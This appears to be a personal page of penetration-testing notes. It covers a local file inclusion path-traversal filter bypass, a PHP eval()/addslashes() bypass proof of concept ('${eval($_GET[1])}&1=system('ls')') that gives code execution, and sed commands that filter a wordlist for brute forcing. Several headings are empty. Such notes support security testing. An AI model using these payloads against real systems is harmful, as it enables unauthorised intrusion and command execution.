Skip to main content
  1. Hacking/


Disclaimer: These are my personal notes, published "as-is" without warranty or guarantee of any kind. Use at your own risk. Licensed CC BY-NC-SA 4.0.

Local file inclusion #

  • ../ specific find/replace can be bypassed with ..//
  • e.g. /uploads/%2e%2e/%2fsys/class/net/eth0/address/uploads/..//sys/class/net/eth0/address
  • Resolve a network path = http://host.tld/?page=//

PHP - Bypass eval() with addslashes() #

Where a value from a URL is passed through eval() with addslashes()

POC: ?str=${eval($_GET[1])}&1=phpinfo();

For example: GET /?format=${eval($_GET[1])}&1=system('ls');

Command injection #

Characters #


Resources #

File upload #


Brute forcing #

If we know the password rules:

sed -ri '/^.{,7}$/d' words.txt # remove shorter than 8
sed -ri '/[!-/:-@\[-`\{-~]+/!d' words.txt # remove no special chars
sed -ri '/[0-9]+/!d' words.txt # remove no numbers